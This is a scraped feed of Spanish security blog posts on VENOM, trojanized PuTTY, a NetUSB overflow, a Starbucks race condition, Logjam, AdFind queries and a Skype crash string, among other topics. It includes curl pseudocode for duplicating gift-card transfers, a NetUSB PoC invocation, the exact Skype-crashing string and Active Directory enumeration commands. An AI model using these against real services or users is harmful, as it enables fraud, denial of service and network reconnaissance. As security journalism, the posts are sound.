Quantcast
Channel: hackplayers
Viewing all 1664 articles
Browse latest View live

Parchea VENOM sin reiniciar QEMU

$
0
0
Seguro que ya os habéis enterado... Los investigadores de CrowdStrike han descubierto una nueva vulnerabilidad que han bautizado como VENOM (Virtualized Environment Neglected Operations Manipulation) que permite a un atacante acceder al datastore (disco físico) de una máquina virtual. Concretamente la vulnerabilidad con CVE-2015-3456 se trata de un desbordamiento de buffer que afecta a la emulación del viejo Floppy Disk Controller (FDC) que implementan los hipervisores KVM/QEMU y Xen.

Imaginar lo que significa: tenemos contratado a un proveedor un servidor virtual en la "nube" que comparte la misma máquina física con otros servidores de otros clientes. Todos los datos de esa máquina física podrían ser robados... Urge entonces parchear lo antes posible, pero ¿es posible implementar un parche sin reiniciar los procesos qemu que ya están ejecutándose?


Según leemos en VenomFix se puede conseguir en casi todos los casos utilizando comandos virsh, una herramienta en línea de comandos para administrar a los huéspedes y al hypervisor. De esta manera no es necesario el reinicio completo y se parchea cada instancia con sólo un pequeño bloqueo de unos segundos.¡Proveedores de VPS tomad nota!

El primer paso es actualizar o asegurarse de que ya se ha parcheado la versión de qemu. En Redhat/CentOS sería qemu-kvm-0.12.1.2-2.448 o posterior. Esto se puede lograr simplemente actualizando la distro ya que la mayoría ya lo han liberado a través de su gestor de paquetes.

El siguiente paso es guardar todas las instancias en /dev/shm (RAM) y restaurarlas a un estado de ejecución. Las instancias se bloquearán durante un breve tiempo y volverán a su estado normal. Antes de ejecutar el siguiente comando hay que asegurarse de que tenemos suficiente espacio en memoria o cambiar /dev/shm o disco:

for i in $(virsh list --all | grep running | awk '{print $2}') ; do instance=$i ; date ; time virsh save $instance /dev/shm/$instance ; date ; time virsh restore /dev/shm/$instance ; date ; rm -f /dev/shm/$instance ; done

Podremos confirmar que el proceso usa el nuevo binario viendo el cambio de inodo:




Nota:
Las instancias guest de QEMU KVM que están usando huge pages Anónimas (transparentes) obtendrán un error 'alloc_mem_area: can't mmap hugetlbfs pages'. Para solucionarlo primero debemos salvar la instancia ('virsh save') y luego fijar el tamaño de las páginas con:

# echo 4096 > /proc/sys/vm/nr_hugepages

Pero ojo que no se pueden combinar HugePages fijadas con KSM (Kernel Same-Page Merging)... más información en:

http://www.venomexploitfix.com/

Las APIs más utilizadas por malware

$
0
0
En Binary Networks vemos un curioso experimento en el que analizaron una gran cantidad de muestras de malware para ver las APIs más utilizadas.
En total reunieron 5TB de espacio con 549.035 ejecutables, todos únicos y confirmados por VirusTotal. Luego mediante un script multihilo en Python extrajeron todos los imports y contaron las veces en las que cada muestra llamaba a una API.

De este análisis obtuvieron resultados muy interesantes. En total hubo 21.043 muestras sin importaciones mientras que 527.992 por lo menos importaron una API. Es decir, sólo el 3,8% de las muestras no tenía ninguna importación. Eso significa que menos del 5% de los archivos se empaquetaron bien sin importaciones estáticamente incluyendo sus dlls, o estaban usando sus propios métodos para la búsqueda e importación de APIs fuera de la tabla de importación del propio PE.

Del resto, de los que si hacían importaciones, hubo un total de 120.126 API importadas de forma exclusiva, un número mucho más grande de lo imaginado. 


Las 10 APIs más utilizadas, con un gran escalón respecto al resto, son las siguientes:

#1  GetProcAddress           394546
#2  LoadLibraryA               344607
#3  GetModuleHandleA       305054
#4  ExitProcess                 301073
#5  VirtualAlloc                 244900
#6  WriteFile                    223855
#7  GetModuleFileNameA   221006
#8  CloseHandle               220358
#9  RegCloseKey              213748
#10 VirtualFree                211790

Para ver algunas otras conclusiones interesantes y obtener el PDF detallado con los resultados visita: https://www.bnxnet.com/top-maliciously-used-apis/.

Encuentran versiones de Putty troyanizadas que roban las credenciales de sus víctimas

$
0
0
El equipo de respuesta de seguridad de Symantec ha encontrado una versión troyanizada del popular cliente SSH PuTTY que roba credenciales a los usuarios. 

La versión maliciosa fue vista por primera vez por Symantec en Internet a finales de 2013, si buen su distribución fue mínima. Por lo tanto, la distribución actual de la versión troyanizada de PuTTY no es generalizada y no es específica de una región o de una industria, según los investigadores. 

El PE de la versión analizada tiene el hash md5 b5c88d5af37afd13f89957150f9311ca, ha sido compilado con otra versión de Microsoft Visual C++ (se nota en el interfaz de usuario) y tiene este "about":


Cuando un usuario realiza una búsqueda de PuTTY en el motor de búsqueda, se proporcionan múltiples resultados. Si la víctima sin saberlo, selecciona la página web comprometida en lugar de la página de descarga oficial de PuTTY, el sitio web comprometido redirige a la víctima varias veces, y luego conecta a la víctima a una dirección IP en los Emiratos Árabes Unidos para proporcionar una versión maliciosa de PuTTY.

Normalmente PuTTY SSH utiliza el siguiente formato de URL estándar para la conexión:

ssh://[USER NAME]:[PASSWORD]@[HOST NAME]:[PORT NUMBER]

 

Si la versión maliciosa de PuTTY conecta correctamente con un host, copia la URL de conexión SSH, codifica la dirección URL con Base64 y en https, y envía un ping que contiene esa cadena al servidor web del atacante. Así, con estas credenciales, un atacante podrá hacer fácilmente una conexión con el servidor.



Moraleja: ¡Chequea siempre tus fuentes y preferiblemente descarga en sitios oficiales!

Fuentes:

- Check your sources! Trojanized open source SSH software used to steal information
- Trojanized, info-stealing PuTTY version lurking online
- Trojanized PuTTY Software

- Trojanized SSH Client PuTTY Steals Credentials 

BOF en NetUSB o como un pequeño componente de software vulnerable puede afectar a millones de dispositivos en el mundo

$
0
0
NetUSB es una tecnología propietaria desarrollada por la empresa taiwanesa KCodes para proveer la funcionalidad "USB sobre IP". A grandes rasgos cualquier dispositivo USB como una impresora, un disco portátil, etc. conectado a un sistema Linux embebido como un router, un punto de acceso o una caja dedicada, estará disponible en red mediante un driver de kernel Linux que ejecuta un servidor en el puerto TCP 20005. Luego el cliente instalará un software (disponible para Windows y OS X), conectará al servidor y será como si el dispositivo USB estuviera conectado en local.

Para la conexión cliente-servidor es necesario pasar primero una autenticación que se realiza mediante claves AES estáticas en ambos extremos. Durante el inicio de la conexión el cliente envía el nombre de equipo y puede especificar la longitud de dicho nombre. Si se especifica con más de 64 caracteres se producirá un desbordamiento de buffer en el stack del kernel del servidor que podría permitir la ejecución de código en el sistema afectado.

int computername_len;
char computername_buf[64];
// connection initiation, handshake
len = ks_recv(sock, &computername_len, 4, 0);
// ...
len = ks_recv(sock, computername_buf, computername_len, 0); // boom!
Ya hay un script para la prueba de concepto "netusb_bof.py" que causa un DoS/reinicio del dispositivo:

./netusb_bof.py 192.168.1.1 20005 500

Este script todavía no ha sido publicado ni se publicará hasta que todos o la mayoría de vendedores parcheen la vulnerabilidad. El gran problema es que este driver de Kernel se encuentra activado por defecto en miles de dispositivos: TP-Link, Netgear, D-Link, TrendNet, Zyxel, ...


Fuentes:
- KCodes NetUSB: How a Small Taiwanese Software Company Can Impact the Security of Millions of Devices Worldwide 
- SEC Consult Vulnerability Lab Security Advisory 20150519-0  
- NetUSB Driver Flaw Exposes Millions of Routers to Hacking

Hackeando Starbucks para conseguir café gratis ilimitado

$
0
0
Egor Homakov, desarrollador y hacker ruso, saltó a la "fama" en 2012 al hacerse admin en GitHub explotando una vulnerabilidad en Ruby on Rails (el framework utilizado por GitHub) que, pese a reportarla con anterioridad, no había sido solucionada. Ahora, Egor anda por San Francisco y nos trae otra bonita historia acerca de cómo encontró una manera de generar una cantidad ilimitada de dinero en tarjetas regalo de Starbucks. ¡Café gratis para siempre!... o hasta que te pillen... :-S


starbucks.com tiene cuentas de usuario, donde se pueden agregar tarjetas de regalo, comprobar saldos e incluso transferir dinero entre estas tarjetas de regalo. Hay un interesante tipo de vulnerabilidades llamada "condición de carrera", que es un error muy común en los sitios web con saldos, vales u otros recursos limitados (sobre todo dinero).

Egor compró tres tarjetas de 5$ cada una. Para transferir dinero de la Tarjeta1 a la Tarjeta2 se realizan dos simples peticiones POST: la primera /step1?amount=1&from=wallet1&to=wallet2 guarda los valores en la sesión y la segunda petición POST/step2?confirm es la que realmente transfiere el dinero y limpia la sesión.

Esto hace que la explotación sea más difícil porque la sesión se destruye inmediatamente después de la petición de confirmación y, si volvemos transferir dinero otra vez, fallará. Pero esta "protección" todavía es fácil de pasar por alto: sólo tenemos que utilizar la misma cuenta en dos navegadores diferentes (con diferentes cookies de sesión).

El pseudo código para la explotación sería:

# prepara los detalles de la tranferencia de dinero en ambas sesiones
curl starbucks/step1 -H «Cookie: session=session1» --data «amount=1&from=wallet1&to=wallet2»
curl starbucks/step1 -H «Cookie: session=session2» --data «amount=1&from=wallet1&to=wallet2»
# envía $1 simultanemamente desde wallet1 a wallet2 usando ambas sesiones
curl starbucks/step2?confirm -H «Cookie: session=session1» & curl starbucks/step2?confirm -H «Cookie: session=session2» &


Después de 5 intentos fallidos, Egor estaba a punto de darse por vencido. Muchos desarrolladores utilizan protecciones insuficientes como limitar el número de peticiones por IP/cuenta/acción, haciendo una pausa aleatoria o mediante transacciones de base de datos de una manera incorrecta. La única manera correcta *y pesimista* de hacerlo es mediante bloqueo (cláusula FOR UPDATE).

Pero sí, la sexta petición creó dos transferencias de 5 dolares desde wallet1 a wallet2, por lo que en vez de tener 10$ en la segunda tarjeta tenía 15$... y para demostrar que no se trata de un error o de algún problema de caché, agarró la tarjeta de 15$ (cuyo saldo había aumentado ++) más la tarjeta de 5$ que tenía adicional (y que no entiendo muy bien para que la quería en esta PoC), se acerco al Starbucks más cercano y...



¡Pero no corrais a comprar tarjetas regalo de Starbucks! Que esto tiene final feliz: responsible disclosure


Egor mandó un correo a InformationSecurityServices_at_starbucks.com el 23 de marzo y, después de buscar y buscar alguien responsable y al que realmente le importara, después de que encima le llamaran de todo menos "bonito", el bug fue solucionado 10 días después.

Y como él bien dice: en vez de notificar la vulnerabilidad, podía haber comprado un montón de tarjetas de regalo falsas en todo el mundo, haber aumentado el saldo de cada una de ellas y haberlas vendido al 50% a cambio de Bitcoins. Y así hasta conseguir 2 millones de dólares (si realmente Starbucks no rastrea los saldos de sus tarjetas). Pero claro, es mejor avisar y que te pongan la cara colorada, es lo que tiene ser de los buenos... pero al menos, y aunque no sea mucho, algunos asentimos, admiramos y respetamos... go, go, go!


Fuente: Hacking Starbucks for unlimited coffee

Logjam: la puerta que dejó abierta el gobierno de Clinton hoy tiene que cerrarse (downgrade en Diffie-Hellman)

$
0
0
en la foto Diffie y Hellman, las dos crypto-leyendas
No corren buenos tiempos para las comunicaciones "seguras" en Internet, a las últimas vulnerabilidades conocidas BEAST, CRIME, Lucky Thirteen, BREACH, POODLE, Heartbleed y FREAK se le añade una nueva bautizada como Logjam que permite a un atacante en el medio de una comunicación cifrada (MiTM) hacer un downgrade de TLS hasta 512 bits, permitiendo leer o modificar cualquier dato en tiempo real.

Digamos que se trata de un ataque reminiscente de FREAK, pero el problema está en un fallo en el protocolo TLS en vez de en un fallo de implementación y ataca al intercambio de claves con Diffie-Hellman en lugar de al intercambio de claves con RSA. 


Afecta a cualquier servidor que soporte DHE_EXPORT y a todos los navegadores web modernos. Y, nada más y nada menos, el 8.4% del top un millón de dominios son en principio vulnerables.

Lo curioso es que esta vulnerabilidad viene de la conocida como cripto-guerra de la era Clinton en los 90, en la que se impusieron restricciones a la hora de exportar cifrados fuertes a naciones que EE.UU. consideraba hostiles, para que el FBI y otras agencias pudieran descifrar la información en caso necesario. Como resultado, muchos navegadores y servidores siguen llevando una rutina para utilizar un protocolo débil y fácil de romper. Es decir tenemos un bug vigente desde hace 20 años y del que se dice que ha sido utilizado en muchas ocasiones para romper el cifrado de algunas VPNs.

Podéis ver el paper académico de un grupo de investigadores de varias universidades y empresas (coordinados por Google) o visitar Weakdh.org para más detalle. También tenéis una herramienta en esta última web para comprobar si vuestro servidor es vulnerable y arreglarlo si es necesario:
https://weakdh.org/sysadmin.html.

Ya se están parcheando o se van a publicar pronto actualizaciones para Chrome, Firefox y otros navegadores. El problema es el que suele haber con estos ataques de "downgrade": parchear te hará incompatible con quién o qué no haya parcheado, por lo que muchos sitios web vulnerables dejarán de ser accesibles.

Fuentes:
- Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice (paper)
- The Logjam Attack 

- Crypto Wars
- Massive Clinton-era Internet bug shows pitfalls of Obama's 'backdoor' proposal
- The Logjam (and Another) Vulnerability against Diffie-Hellman Key Exchange
- 'Logjam' browser vulnerability fix will block thousands of websites
- Anatomy of a LOGJAM - another TLS vulnerability, and what to do about it
- Today's terrifying Web security vulnerability, courtesy of the 1990s crypto wars
- There’s a new problem with SSL called “Logjam”, here’s what you need to know
- 'Logjam' crypto bug could be how the NSA cracked VPNs

¿Se borran todos los datos al resetear de fábrica un dispositivo Android? Parece que no...

$
0
0
La función de reseteo de fábrica de Android no es tan efectiva como nos gustaría que fuera, según un equipo de investigadores de la Universidad de Cambridge. El grupo estima que de 500 a 630 millones de dispositivos Android podrían no ser capaces de borrar por completo los datos guardados en sus discos internos y tarjetas SD.

Los investigadores llegaron a esta conclusión tras probar 21 dispositivos con versiones 2.3 a 4.3 de Android y a partir de cinco fabricantes diferentes. Durante las pruebas, fueron capaces de recuperar al menos parte de los datos almacenados en cada dispositivo probado - incluso si fue protegido con el cifrado completo de disco. Los datos que se recuperaron incluían contactos, imágenes y vídeos, textos, correos electrónicos y logins para aplicaciones de terceros como Facebook y WhatsApp. También fueron capaces de recuperar el token principal necesario para acceder a todos los datos de usuario de Google en el 80 por ciento de los teléfonos.

Hay muchas razones por las que falla el reseteo de fabrica: según los investigadores, los fabricantes a veces no cargan el software del teléfono con los drivers necesarios para limpiar completamente su disco o la tarjeta SD interna. Además, las unidades flash son muy difíciles de borrar.

Por el momento no está claro si Google o cualquiera de los fabricantes cuyos teléfonos fueron probados están haciendo algo sobre este tema. Pero si realmente quieres proteger tu información antes de tirar, vender o regalar un teléfono antiguo, utiliza la contraseña más complicada que puedas ... o, ya sabes, sal a comprar un martillo.

Fuente: Researchers find Android factory reset faulty and reversible

Analiza la información de tu Directorio Activo con AdFind

$
0
0
Joe Richards, MVP de Microsoft, tiene un interesante recopilatorio de utilidades gratuitas conocidas como "joeware" que seguro harán las delicias de cualquier administrador de Windows. Concretamente hoy vemos AdFind, una herramienta de consulta del Directorio Activo que es una mezcla de ldapsearch, search.vbs, ldp, dsquery y dsget además de incluir otras utilidades adicionales. Veréis con los ejemplo como es posible desgranar por completo la información de un dominio...

Aquí encontraras el uso de AdFind y ejemplos.


Añade los siguientes parámetros con el nombre de host/IP del controlador de dominio y las credenciales del usuario de dominio si realizas las consultas desde una máquina fuera de dominio:

AdFind -h direccion_ip -u "usuario@dominio.inet" -up password

Consulta la versión del esquema

AdFind -schema -s base objectVersion

Consulta wellKnownObjects

AdFind -default -s base wellknownObjects

Lista los objetos borrados

AdFind -default -rb "CN=Deleted Objects" -showdel

Lista los objetos en conflicto

AdFind -b -gc -f "(Name=*\0ACNF:*)" -dn

Obtiene todos los atributos

AdFind.exe -schema -f “objectClass=attributeSchema” cn lDAPDisplayName -nodn -csv >Attributes.txt

Obtiene todas las Classes

AdFind.exe -schema -f “objectclass=classSchema” cn lDAPDisplayName -nodn -csv >Classes.txt

Encuentra el nivel funcional del Dominio (por ejemplo Domain=Contoso.com)

AdFind -s Base -b "DC=Contoso,DC=com" msDS-Behavior-Version

Lista subredes

AdFind -subnets -f (objectCategory=subnet)

Lista sufijos UPN

AdFind -partitions -s base uPNSuffixes

Lista la política de contraseñas

AdFind -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties

Comprueba el tiempo de vida de Tombstone

AdFind -config -f objectclass=ntdsservice tombstoneLifetime

Consulta el DA para todos los Grupos y Usuarios que tienen el adminCount = 1 (adminSDholder)

AdFind -default -f "(&(|(&(objectCategory=person)(objectClass=user))(objectCategory=group))(adminCount=1))" -dn

Lista todos los objetos en una OU (por ejemplo OU=NewYork, Domain=Contoso.com)

AdFind -b "OU=NewYork,DC=Contoso,DC=com" -s one -dn

Lista todas las OUs en un Dominio

AdFind -default -f "objectcategory=organizationalUnit" -dn

Encuentra las cuentas desactivadas

AdFind -default -bit -f userAccountControl:AND:=2

O

AdFind -s subtree -b DC=Contoso,DC=com -f userAccountControl:1.2.840.113556.1.4.803:=2 -dn

Lista los Usuarios con la contraseña expirada

AdFind -s subtree -b ,DC=Contoso,DC=com -f userAccountControl:1.2.840.113556.1.4.803:=8388608 -dn

Lista el Display Name de los usuarios del dominio

AdFind -b DC=Contoso,DC=com -f "objectcategory=person" displayName -sl

Encuentra el SID History de un usuario (por ejemplo User=Ed.Price)

AdFind -default -f name=Ed.Price sIDHistory

Lista los Usuarios a los que se le permite Dial-in en la OU (por ejemplo OU=IT, Domain=Contoso.com)

AdFind.exe -b "OU=IT,DC=Contoso,DC=com" -f "(&(objectCategory=person)(objectClass=user)(msNPAllowDialin=TRUE))" distinguishedName sAMAccountName
 
Lista los Usuarios a los que NO se le permite Dial-in en la OU (por ejemplo OU=IT, Domain=Contoso.com)

AdFind.exe -b "OU=IT,DC=Contoso,DC=com" -f "(&(objectCategory=person)(objectClass=user)(msNPAllowDialin=FALSE))" distinguishedName sAMAccountName

Lista los Usuarios que tienen acceso Dial-in con Control de Acceso a través de una Política de Acceso Remoto (por ejemplo OU=IT, Domain=Contoso.com)

AdFind.exe -b "OU=IT,DC=Contoso,DC=com" -f "(&(objectCategory=person)(objectClass=user)(!(msNPAllowDialin=*)))" distinguishedName sAMAccountName

Lista los miembros de un Grupo (por ejemplo Group=IT_Support)

AdFind -b "CN=IT_Support,CN=Users,DC=Contoso,DC=com" member

Cuenta el número de miembros de un Grupo (por ejemplo Group=IT_Support)

AdFind -f "sAMAccountName=IT_Support" member -list | AdFind -c

Lista los miembros de un grupo anidado (por ejemplo Group=Support, OU=IT, Domain=Contoso.com)

AdFind -default -bit -f "memberof:1.2.840.113556.1.4.1941:=CN=Support,OU=IT,DC=Contos,DC=com" sAMAccountName -nodn

Lista todos los grupos en uba OU (por ejemplo OU=IT, Domain=Contoso.com)

AdFind -b "OU=IT,DC=Contoso,DC=com" -s subtree -f "(objectcategory=group)"

Lista todos los grupos de distribuciíon universales en una OU (por ejemplo OU=IT, Domain=Contoso.com)

AdFind –gc -b "OU=IT,DC=Contoso,DC=com" -s subtree -bit -f "(&(objectcategory=group)(sAMAccountType=268435457)(grouptype:OR:=8))" 1.1

Lista todos los grupos de seguridad universales en una OU (por ejemplo OU=IT, Domain=Contoso.com)

AdFind –gc -b "OU=IT,DC=Contoso,DC=com" -s subtree -bit -f "(&(objectcategory=group)(grouptype:AND:=-2147483640))" 1.1

Lista todos los grupos universales (Distribución y Seguridad) de una OU (por ejemplo OU=IT, Domain=Contoso.com)

AdFind -gc -b "OU=IT,DC=Contoso,DC=com" -s subtree -bit -f "(&(objectcategory=group)(grouptype:OR:=8))" 1.1

Lista todos los grupos globales (Distribution & Security) de una OU (por ejemplo OU=IT, Domain=Contoso.com)

AdFind -b "OU=IT,DC=Contoso,DC=com" -s subtree -bit -f "(&(objectcategory=group)(grouptype:OR:=2))" 1.1

Lista todos los grupos de seguridad globales de una OU (por ejemplo OU=IT, Domain=Contoso.com)


AdFind -b "OU=IT,DC=Contoso,DC=com" -s subtree -bit -f "(&(objectcategory=group)(grouptype:AND:=-2147483646))" 1.1

Lista todos los grupos de distribución globales de una OU (por ejemplo OU=IT, Domain=Contoso.com)

AdFind -b "OU=IT,DC=Contoso,DC=com" -s subtree -bit -f "(&(objectcategory=group)(sAMAccountType=268435457)(grouptype:OR:=2))" 1.1

Lista todos los grupos locales de dominio (distribución y seguridad) de una OU (por ejemplo OU=IT, Domain=Contoso.com)

AdFind -b "OU=IT,DC=Contoso,DC=com" -s subtree -bit -f "(&(objectcategory=group)(grouptype:OR:=4))" 1.1

Lista todos los grupos locales de dominio de seguridad de una OU (por ejemplo OU=IT, Domain=Contoso.com)

AdFind -b "OU=IT,DC=Contoso,DC=com" -s subtree -f "(&(objectcategory=group)(sAMAccountType=536870912))" 1.1
 
Lista todos los grupos locales de dominio de distribución de una OU (por ejemplo OU=IT, Domain=Contoso.com)

AdFind -b "OU=IT,DC=Contoso,DC=com" -s subtree -f "(&(objectcategory=group)(sAMAccountType=536870913))" 1.1

Encuentra todos los objetos Computer del dominio y muestra cn & createTimeStamp

AdFind -b dc=Contoso,dc=com -f "objectcategory=computer" cn createTimeStamp


Fuente:AdFind command examples 

Top 8 servicios VPN de pago que ofrecen mayores capacidades

$
0
0
Hace ya más de dos años os hablamos de 25 servicios VPN que tenían al menos una modalidad de uso gratuita. Hoy vamos a ver una lista de 8 proveedores que son de pago (aunque hay unos pocos con versiones libres o trial) pero que ofrecen mayores capacidades en cuanto a ancho de banda, disponibilidad y seguridad. Además todos aceptan Bitcoin como sistema de pago:

1. hide.me

Parece que hide.me ha extendido su red y tiene también servidores en EE.UU, pero la mayoría de sus servidores están disponibles en Europa. En su página se enumeran todos los servidores disponibles, sus países, así como su capacidad y el uso actual. La mayoría de los servidores están funcionando a 1GBps, y algunos son capaces de obtener hasta 10 Gbps.

2. NordVPN

NordVPN destaca por su técnica de doble cifrado que aplica AES-256-CBC dos veces mediante dos nodos de enlace. Además incluye una lista de 3000 proxies gratuitos. Cuesta menos de 12$ al mes y también tiene un programa de afiliados/referidos.

3. AirVPN

Utiliza OpenVPN para conectar los clientes con sus servidores. Son bastante generosos con su servicio: una única VPN puede tener hasta tres conexiones simultáneas, no hay límites en cuanto a tiempo y se puede utilizar todo el ancho de banda disponible con un mínimo de 4mbps simétricos. Su modo de negocio se basa en la transparencia.

4. Perfect Privacy

Tiene más de 30 servidores en 25 países diferentes. Permite cambiar y usar en cascada cuatro servidores diferentes para ofrecer una capa adicional de seguridad. Los servidores dedicados se están ejecutando en un disco RAM para asegurar su anonimato y privacidad. Todos los servidores tienen proxies Socks5 y Squid y pueden resolver direcciones .onion (TOR).

5. proxy.sh

Proxy.sh ofrece cifrados normales así como algoritmos experimentales como ECC o Serpent para proporcionar la experiencia más segura. Viene con muchos extras, como el soporte para TOR o DNSCrypt. Ofrece el código fuente de sus clientes VPN e incluso acceso a la API.

6. Mullvad

El servicio se lleva desde Suecia. Utiliza PPTP con clientes OpenVPN. Bloquea el puerto TCP/25 así que si quieres enviar correso tendrás que enviarlo usando SSL/TLS por el puerto 465.

7. IVPN

IVPN funciona desde el año 2009, lo que los coloca en una posición bastante sólida como proveedor de VPN ya que ha sido capaz de mantener su reputación en los últimos años. Destacan que en su red hay numerosos usuarios con clientes P2P pesados, lo que significa que tienen una buena latencia y velocidad. También son miembros de la EFF (Electronic Frontier Foundation), lo que significa que se toman muy en serio la libertad de palabra de Internet.

8. IPredator

IPredator también nació en el 2009, pero les llevó algo más de tiempo ganar el impulso que necesitaban. Ahora, el proyecto en sí está construido por las mismas personas que construyeron The Pirate Bay y, aunque a primera vista no parece ser una buena idea (a causa de los problemas que TPB ha tenido), iPredator en realidad es un servicio VPN muy sólido y popular entre las comunidades de hackers.

Fuente: Top 8 VPN Providers with Hardened Security

--- Article Removed ---

$
0
0
***
***
*** RSSing Note: Article removed by member request. ***
***

Nueva herramienta para gestionar los riesgos humanos

$
0
0
¿Cómo priorizar los riesgos humanos? La mayoría las organizaciones / responsables de seguridad tienen tiempo y recursos limitados para la sensibilización del personal. Sólo se puede enseñar a la gente y cambiar ciertas conductas como resultado. Eso significa tener un programa de concienciación verdaderamente eficaz, priorizar los riesgos humanos y centrarse en ellos. Más fácil decirlo que hacerlo.

Gracias a Roderick Currie de SANS, ahora hay una herramienta para ayudar a hacer precisamente eso. Se trata de una simple hoja de cálculo. La idea es listar todos los diferentes riesgos humanos por los que estamos preocupados. A continuación, evaluar el número de incidentes que han tenido relación con ese riesgo, qué tan probable crees que otro incidente vaya a suceder y el impacto si lo hace.

Esta hoja de cálculo utiliza un enfoque cualitativo para medir el riesgo humano, es decir, se utiliza la escala de bajo, medio y alto. Si bien este enfoque no es ni preciso ni exacto, es rápido, sencillo y normalmente 'suficientemente bueno'. Te permite identificar rápidamente en qué riesgos humanos debemos centrarnos.

Quizás parece una tontería pero estas herramientas son importantes ya que demasiadas organizaciones escogen al azar sobre estos temas sin una base sólida. Para gestionar el riesgo humano de verdad, tienes que primero priorizarlos. Puedes descargar un modelo de riesgo de ejemplo y una plantilla aquí.

Fuente: New Tool for Prioritizing Your Human Risks

¿Tienes un Mac de hace más de un año? Pues tienes un Mac vulnerable...

$
0
0
Los equipos Mac de más de un año son vulnerables a ataques que permiten sobrescribir remotamente el firmware con el que arranca la máquina, un exploit que permite controlar dispositivos vulnerables desde la primera instrucción.

El ataque, de acuerdo con una entrada de blog publicada el viernes por el conocido investigador de seguridad de OS X Pedro Vilaca, afecta a Macs enviados antes de mediados del 2014que pueden entrar en modo de suspensión. Concretamente la protección conocida comoFLOCKDN, que controla que el acceso de las aplicaciones en modo usuario a la BIOS sea sólo de lectura, se desactiva cuando la máquina se recupera del modo de suspensión. Esto deja el firmware abierto a que cualquier aplicación pueda reescribir o flashear la BIOS y, por lo tanto, que los atacantes puedan modificar el Interfaz Extensible del Firmware (EFI) que es el que controla el arranque del sistema y otras funciones de bajo nivel antes de cargar el sistema operativo.

Gracias a este fallo y mediante la explotación de vulnerabilidades que permitan elevar privilegios como root (como las que se encuentran regularmente en Safari y otros navegadores web), se podría ejecutar código para forzar al equipo a entrar en modo suspensión para luego lanzar un payload en la recuperación, dejando un firmware malicioso que sobrevive incluso al formateo del disco duro y a la reinstalación del sistema operativo.

El ataque es más grave que el exploit Thunderstrike que salió a la luz a finales del año pasado. Si bien ambos dan a los atacantes el mismo control persistente a nivel bajo de un Mac, el nuevo ataque no requiere acceso físico...

Pedro Vilaca ha confirmado que el exploit funciona en un MacBook Pro Retina, un MacBook Pro 8.2 y un MacBook Air, todos con la última versión del firmware EFI de Apple. Sin embargo, los Macs desde mediados a finales de 2014 parecen ser inmunes a los ataques. No se sabe si Apple parcheó la vulnerabilidad silenciosamente en máquinas más nuevas o si se corrigió de casualidad.

Por el momento, la única manera de prevenir ataques es cambiar la configuración de OS X por defecto desactivando el modo de suspensión.

Fuentes:
- The Empire Strikes Back Apple – how your Mac firmware security is completely broken
- New exploit leaves most Macs vulnerable to permanent backdooring
- Apple Macs vulnerable to EFI zero-day
- Macs older than 1 year may be vulnerable to security exploit

Curso gratuito 'Modern Windows Exploit Development'

$
0
0
Hay varios cursos sobre el desarrollo de exploits pero suelen ser muy caros. También hay un montón de papers, artículos y vídeos en Internet, pero la información está muy dispersa y no siempre es para principiantes. Massimiliano Tomassoli ha publicado el curso Modern Windows Exploit Development con el que podrás aprender a desarrollar exploits en Windows desde el principio. Eso sí, aunque sea un curso introductorio no es un "juego de niños" y se requieren al menos conocimientos de ensamblador x86.

Os dejo el índice de contenidos del curso y os animo a realizarlo:
  1. WinDbg
  2. Mona 2
  3. Structure Exception Handling (SEH)
  4. Heap
  5. Windows Basics
  6. Shellcode
  7. Exploitme1 (ret eip overwrite)
  8. Exploitme2 (Stack cookies & SEH)
  9. Exploitme3 (DEP)
  10. Exploitme4 (ASLR)
  11. Exploitme5 (Heap Spraying & UAF)
  12. EMET 5.2
  13. Internet Explorer 10
    1. Reverse Engineering IE
    2. From one-byte-write to full process space read/write
    3. God Mode (1)
    4. God Mode (2)
    5. Use-After-Free bug
  14. Internet Explorer 11
    1. Part 1
    2. Part 2
Fuente: http://expdev-kiuhnm.rhcloud.com/

Sólo 8 caracteres para hacer fallar a Skype, teniendo incluso que reinstalarlo

$
0
0
Los usuarios de Skype han descubierto un bug en la aplicación bastante llamativo: sólo enviando la cadena de texto “http://:” (sin las comillas) se bloquea (crash) la aplicación y, lo peor, lo hace cada vez que se intente iniciar sesión de nuevo. Según comenta el usuario “Giperion” "limpiar el historial de chats no ayuda, porque cuando Skype descargue el historial del servidor volverá a fallar."


El bug funciona en Windows, Android e iOS, aunque parece no tener efecto en Mac o la versión de Skype de Windows 8.1 (la app tactil de metro).

Como comenta otro usuario “Lazymax” es posible volver a utilizar Skype si el usuario que te ha mandado la cadena de texto borra el mensaje y si instalas una versión más vieja de Skype (en Android e iOS sólo tienes las últimas versiones disponibles).

Skype ya ha confirmado el bug y está trabajando para solucionarlo.

Fuentes:
- A Simple Message Can Crash Skype So Badly You Need to Reinstall It
- These 8 characters crash Skype, and once they’re in your chat history, the app can’t start

OpenSesame, hackeando garajes en segundos

$
0
0
OpenSesame es un dispositivo que puede abrir de forma inalámbrica y en segundos casi cualquier puerta de garaje con acceso mediante un pin fijo. Utiliza un nuevo ataque descubierto por Samy Kamkar que se aprovecha del limitado espacio de claves pero que reduce el tiempo para obtener el código en un 95%. Y para llevarlo a cabo sólo necesita un *bonito* juguete de Mattel, un Radica Girltech IM-ME con un efectivo chip RF TI CC1110 sub-GHz y reprogramado con un GoodFET.

Pero centrémonos en el ataque. ¿En qué consiste exactamente? En un equipo inalámbrico normal se utiliza un código de 8 a 12 bits. Si un simple click envía el mismo código 5 veces y cada "bit" tarda 2ms en enviarse con un tiempo de espera de otros 2ms, las cuentas son claras: 12 bits * 2ms transmisión * 2ms espera * 5 veces = 240ms, que es lo que tarda en enviarse una combinación de 12 bits. Entonces, para un ataque de fuerza bruta del espacio de claves de 8, 9, 10, 11 y 12 bits:

(((2 ** 12)*12) + ((2 ** 11)*11) + ((2 ** 10)*10) + ((2 ** 9)*9) + ((2 ** 8)*8)) = 88576 bits

88576 bits * 4ms * 5 retransmisiones = 1771.52 segundos = 29 minutos


Es decir, necesitamos hasta 29 minutos para abrir un garaje con un código de 8 a 12 bits (suponiendo que conocemos el índice de frecuencia y de transmisión, los cuales son bastante comunes.) Si tenemos que intentar algunas frecuencias diferentes y velocidades de transmisión, entonces el tiempo que se necesitamos es un múltiplo de 29 minutos.

Ya veis que el objetivo de este ataque es reducir este tiempo a segundos.

La primera reducción es obvia: quitar la retransmisión que se utiliza para ayudar al receptor a detectar la señal en caso de interferencia. Pero pensemos que no hay interferencias y en lugar de enviar la señal 5 veces la enviamos una única vez:
